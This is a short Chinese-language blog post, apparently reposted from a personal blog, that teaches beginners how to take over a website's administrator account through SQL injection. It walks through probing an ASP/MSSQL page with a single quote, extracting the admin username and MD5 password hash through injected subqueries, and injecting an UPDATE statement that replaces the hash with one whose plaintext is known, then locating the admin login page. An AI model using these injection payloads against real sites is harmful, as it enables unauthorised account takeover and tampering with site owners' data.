在線破解MD5的網站上查.但有的MD5密碼很偏,所以一些新手會放棄.我為新手介紹一種很簡單就能修改難猜解MD5
密碼的方法.
隨便找個地址
http://www.2cto.com/news.asp?id=121
在地址后輸入單引號,顯示
Microsoft OLE DB Provider for SQL Server 錯誤 ’80040e14’
字元串 ’’’ 之前有未閉合的引號
/news/wantpws.asp,行63
說明沒有過濾單引號且資料庫是MSSQL.
and 1=1出錯.and 1=2正常.
接著輸入
http://www.2cto.com/news.asp?id=1or admin_user in (select id from admin)
得到帳號為:admin
http://www.2cto.com/news.asp?id=121or admin_password in (select id from admin)
得到密碼為:a4716077c2ba075c
接下來我們就可以改密碼了.但我們先前要知道我們加密的字元:e8dc763194f29433
鍵入 :
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’--
這句的意思就是用e8dc763194f29433替換a4716077c2ba075c,以達到修改密碼的目的.
掃一下後台為
http://www.2cto.com/admin/admin_login.asp
from:Any'S Blog
[火星人 ] SQL注入直接修改難猜解的MD5密碼已經有384次圍觀
